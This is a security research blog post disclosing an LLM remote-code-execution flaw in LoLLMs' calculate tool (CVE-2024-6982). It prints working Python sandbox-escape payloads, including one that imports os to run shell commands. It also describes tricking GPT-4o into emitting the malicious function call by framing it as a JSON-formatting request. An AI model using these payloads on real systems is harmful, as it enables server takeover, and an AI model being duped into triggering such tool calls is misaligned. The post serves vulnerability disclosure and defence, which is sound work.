Anatomy of an LLM RCE

October 28, 2024 Shaked Reiner

As large language models (LLMs) become more advanced and are granted additional capabilities by developers, security risks increase dramatically. Manipulated LLMs are no longer just a risk of ethical policy violations; they have become a genuine security threat, potentially aiding in the compromise of the systems they’re integrated into. These critical threats have recently been identified in various applications, from a data framework for LLMs known as LlamaIndex to an SQL agent called Vanna.AI and even the LLM integration framework LangChain.

In this post, we will demystify this risk by examining the anatomy of an LLM Remote Code Execution (RCE) vulnerability. We’ll start by understanding how large language models are capable of executing code, and then we’ll dive deep into a specific vulnerability we uncovered.

Intro

Give an LLM some text, and it can blabber all day; teach an LLM to run code, and it can solve problems endlessly.

While this is likely the thinking in most AI companies today, from a security perspective it can be a double-edged sword: highly capable LLMs can be turned against their developers by attackers. An LLM, as its name suggests, is just a large language model. It takes input from the user and outputs text, token by token, which can form an answer to a question, a hallucination (some might say bullshit) or even code. How can we turn a text-outputting machine into an agent that can perform tasks and run code? The truth is that we can’t. We must use a component that’s external to the LLM, in the form of traditional software rather than a neural network like the LLM itself. Since we know LLMs can be jailbroken almost 100% of the time, and we know they don’t have the ability to execute code on their own, the question becomes not whether the LLM itself can be vulnerable to an attack, but whether the integrations between the LLM and its external components are.

Demystifying LLM Code Execution

To better understand this interface between an LLM and the external world, let’s examine the simple integration that exists in LoLLMs. LoLLMs is a “hub for LLM (Large Language Models) and multimodal intelligence systems. This project aims to provide a user-friendly interface to access and utilize various LLM and other AI models for a wide range of tasks”. For our purposes, we used the OpenAI integration with gpt-4-turbo-2024-04-09.

We’ll focus on the calculation functionality, which enables the LLM to perform arithmetic operations when needed. Generally speaking, the components of such an integration between an LLM and an external tool can be seen in the following diagram.


Figure 1

Let’s see how those components manifest in the LoLLMs calculate functionality shown in the figure below.


Figure 2

First, we have the system prompt (1). A system prompt is an instruction to the LLM that is added to every session. It is designed to guide the behavior, tone, style and scope of the LLM’s responses during this session. A system prompt can also make the LLM aware of the tools at its disposal. In our case, it’s the arithmetic calculation function. In the following snippet from the system prompt we can see the relevant parts for our calculator.

!@>system:
!@>Available functions:
...
Function: calculate
Description: Whenever you need to perform mathematic computations, you can call this function with the math expression and you will get the answer.
Parameters:
  - expression (string):
...

Your objective is interact with the user and if you need to call a function, then use the available functions above and call them using the following json format inside a markdown tag:```function
{
"function_name":the name of the function to be called,
"function_parameters": a list of  parameter values
}
```
!@>current_language:
english
!@>discussion_messages:

At the start of the system prompt, the LLM is informed that there are functions available to it, followed by a description of each of those functions. Our calculate function is listed among them, with a description that lets the LLM know it can use it whenever it needs to perform a mathematic computation, and that it should call this function with a math expression string. At the end of the prompt, the LLM is told its objective: to interact with the user and call any of the functions, if needed, using a simple JSON calling convention in which it specifies the name of the function and its parameters. We expect the LLM to “understand” what capabilities are available to it and, when it sees a complex mathematical expression, to format its output as follows:

```function
{
  "function_name": "calculate",
  "function_parameters": {
    "expression": "<the math expression to evaluate>"
  }
}
```

So far, we have covered these components: (1) The system prompt that teaches the LLM how to use the integration, (2) a math expression input by the user and (3) the specific format the LLM must use in order to execute the function. How do we get from a simple LLM output to code execution? That’s where some simple good old Python code comes into play.

Let’s follow the call stack starting with interact_with_function_call(), which calls generate_with_function_calls() to perform LLM inference on the user input. This function returns the LLM-generated text, as well as an array of the function calls that need to be executed according to the user input (step 3 from Figure 1). To do that, it calls the extract_function_calls_as_json() function.

# https://github.com/ParisNeo/lollms/blob/ccf237faba17935efd1e8ecbbf12f494c837333b/lollms/personality.py#L3870-L3871

# Extract the function calls from the generated text.
function_calls = self.extract_function_calls_as_json(generated_text)

return generated_text, function_calls

The function responsible for extracting function calls simply detects code blocks outputted by the LLM, checks whether they are formatted exactly as they should be for a function call, and extracts the function name and parameters as follows:

# https://github.com/ParisNeo/lollms/blob/ccf237faba17935efd1e8ecbbf12f494c837333b/lollms/personality.py#L4049

function_calls = []
for block in code_blocks:
    if block["type"]=="function" or block["type"]=="json" or block["type"]=="":
        content = block.get("content", "")
        try:
            # Attempt to parse the JSON content of the code block.
            function_call = json.loads(content)
            if type(function_call)==dict:
                function_calls.append(function_call)
            elif type(function_call)==list:
                function_calls+=function_call
        except json.JSONDecodeError:
            # If the content is not valid JSON, skip it.
            continue
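
As a quick illustration of what this step produces (a hypothetical model output, not code from LoLLMs), the content of a function-tagged code block is parsed by json.loads() into the dict that later drives execution:

import json

# Hypothetical content of a ```function code block emitted by the model
llm_block_content = """
{
  "function_name": "calculate",
  "function_parameters": {"expression": "2 * (3 + 4)"}
}
"""

function_call = json.loads(llm_block_content)
print(function_call["function_name"])        # calculate
print(function_call["function_parameters"])  # {'expression': '2 * (3 + 4)'}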

After extracting the function call object containing the function name and its parameters, interact_with_function_call() uses execute_function_calls() to execute it. To run the specified function, execute_function_calls() looks the name up in the available function definitions (one definition for each available tool) and simply invokes it:

# https://github.com/ParisNeo/lollms/blob/ccf237faba17935efd1e8ecbbf12f494c837333b/lollms/personality.py#L3930-L3931

fn =  functions_dict.get(function_name)
if fn:
    function = fn['function']
    try:
        # Assuming parameters is a dictionary that maps directly to the function's arguments.
        if type(parameters)==list:
            f_parameters ={k:v for k,v in zip([p['name'] for p in fn['function_parameters']],parameters)}
            result = function(**f_parameters)
            results.append(result)
        elif type(parameters)==dict:
            result = function(**parameters)
            results.append(result)
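
To make the two branches above concrete, here is a hypothetical tool definition (not actual LoLLMs code) showing how a list of parameter values is zipped with the declared parameter names, while a dict is passed through directly as keyword arguments:

# Hypothetical tool definition mirroring the structure execute_function_calls() expects
fn = {
    "function": lambda expression: f"would evaluate {expression!r}",
    "function_parameters": [{"name": "expression", "type": "string"}],
}

# List form: values are zipped with the declared parameter names
parameters = ["2 * (3 + 4)"]
f_parameters = {p["name"]: v for p, v in zip(fn["function_parameters"], parameters)}
print(fn["function"](**f_parameters))                # would evaluate '2 * (3 + 4)'

# Dict form: the parameters map directly to keyword arguments
print(fn["function"](**{"expression": "sqrt(2)"}))   # would evaluate 'sqrt(2)'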

The final step for component (4) is invoking the calculate function:

import math  # the allowed-names whitelist below is built from the math module's namespace

def calculate(expression: str) -> float:
    try:
        # Add the math module functions to the local namespace
        allowed_names = {k: v for k, v in math.__dict__.items() if not k.startswith("__")}
        
        # Evaluate the expression safely using the allowed names
        result = eval(expression, {"__builtins__": None}, allowed_names)
        return result
    except Exception as e:
        return str(e)

calculate simply takes the mathematical expression provided by the LLM and uses eval to evaluate it in some sort of Python sandbox. After all that, the LLM gets the formatted result and produces a final output that is returned to the user in component (5). We now have a full picture of the path from user input to code execution and back.
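
As a quick sanity check (assuming the calculate() definition above), legitimate math expressions evaluate normally, while anything that needs Python built-ins comes back as an error string:

# Assuming the calculate() definition above
print(calculate("sqrt(2) * pi"))      # 4.442882938158366
print(calculate("__import__('os')"))  # error string: __import__ is unreachable without builtins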

From Prompt to Arbitrary Code Execution

Putting on our attacker hats, we’ll examine the security of this integration. Can we make the LLM run any code we like?

Starting by examining the Python sandbox in the calculate() function, we see that the expression is sent to Python’s eval without any built-in functions ("__builtins__": None) and with a limited list of allowed names taken from the math module ({k: v for k, v in math.__dict__.items() if not k.startswith("__")}, i.e., everything except the internal names that start with __). Is this sufficient to prevent us from executing arbitrary code?

Sandboxing Python code is challenging due to its dynamic typing, which allows code to modify itself, and its powerful built-in functions, which are difficult to restrict without breaking functionality. The easiest way of demonstrating arbitrary code execution is to run a command on the server hosting the Python sandbox, which can be done with Python’s os.system() function. In our case, the sandbox tries to prevent us from importing any external modules by disabling the built-in functions. To bypass that, we’ll use a known PyJail trick (one of many here) that reaches the _frozen_importlib.BuiltinImporter object through an empty tuple and uses it to import the os module as follows: ().__class__.__base__.__subclasses__()[108].load_module('os'). After importing the module, it’s only a matter of calling its .system() function to run whichever command we like on the server.


Figure 3 – Python sandbox escape
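
To reproduce the escape outside of LoLLMs, here is a minimal sketch under the same conditions as calculate(): no built-ins and only math names allowed. Instead of hardcoding the subclass index (which varies between Python builds), it looks BuiltinImporter up by name; note that load_module() is long-deprecated and missing from the newest Python releases, so treat this as a sketch of the technique rather than a universal payload.

import math

# Recreate the sandbox conditions used by calculate(): no builtins, math names only
allowed_names = {k: v for k, v in math.__dict__.items() if not k.startswith("__")}

def sandbox(expr: str):
    return eval(expr, {"__builtins__": None}, allowed_names)

# The sandbox works as intended for math expressions...
print(sandbox("sqrt(16) + cos(0)"))  # 5.0

# ...but object introspection is still reachable from a plain tuple literal:
# climb to object, enumerate its subclasses, grab BuiltinImporter and import os.
payload = (
    "[c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == 'BuiltinImporter'][0]"
    ".load_module('os').system('id')"
)
print(sandbox(payload))  # runs `id` on the host; prints the command's exit status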

Let’s try to ask the LLM to calculate this expression and see if we can execute arbitrary code. We’ll start by requesting the calculation of a simple math expression, followed by our payload.


Figure 4 – #1 escape attempt

Nope. We know how to bypass the Python sandbox, but for it to work we need to make the LLM pass our expression to the calculate function. It looks like GPT-4o senses that something is off here and doesn’t even try to invoke the function, probably due to OpenAI’s safety alignment. So to execute arbitrary code, we need to bypass not only the sandbox but also the LLM’s alignment, using some sort of jailbreak. It’s worth mentioning that since LoLLMs is LLM-agnostic and can work with multiple models, the required jailbreak is model-dependent. There are two options: either we jailbreak the model and make it knowingly play along with the attack and execute arbitrary code on the server, or we trick it into triggering the vulnerable function without realizing it’s going to compromise the server. The latter is more elegant, so we’ll go with that. Remember that for the external code executor to work, all the LLM has to do is output a properly formatted JSON code block containing the function name and its parameters. Let’s naively ask the LLM to output it.


Figure 5 – #2 escape attempt

Seems like GPT-4o is not that gullible. We need to think of something else that will make it output this JSON without realizing its real purpose. What if we ask it for help in formatting the JSON?


Figure 6

It worked! GPT-4o thinks it just helped us format some simple JSON, but it actually triggered our arbitrary code execution, and our file has been created. This is how we can leverage the tools at the LLM’s disposal and make it run arbitrary code, starting from a simple natural language prompt. This vulnerability was responsibly disclosed to LoLLMs and has been fixed; it was assigned CVE-2024-6982.
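
For reference, the function block the model ends up emitting looks roughly like the following (the subclass index and the command are illustrative and depend on the target environment):

```function
{
  "function_name": "calculate",
  "function_parameters": {
    "expression": "().__class__.__base__.__subclasses__()[108].load_module('os').system('touch /tmp/pwned')"
  }
}
```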


Figure 7 – Prompt to reverse shell demo

Conclusion

LLM integrations are a double-edged sword: they can deliver better functionality and an improved user experience, but they come with security risk. At the end of the day, we must understand that any ability given to an LLM can be exploited against the system by an attacker. Post-exploitation techniques may focus on the LLM itself, such as backdooring, data extraction or exploiting further integrations, or they might target traditional non-LLM components, like host privilege escalation or lateral movement. For general information on how to securely integrate LLMs into systems and how to implement proper privilege controls, check out our previous post.

Shaked Reiner is a principal cyber researcher at CyberArk Labs.
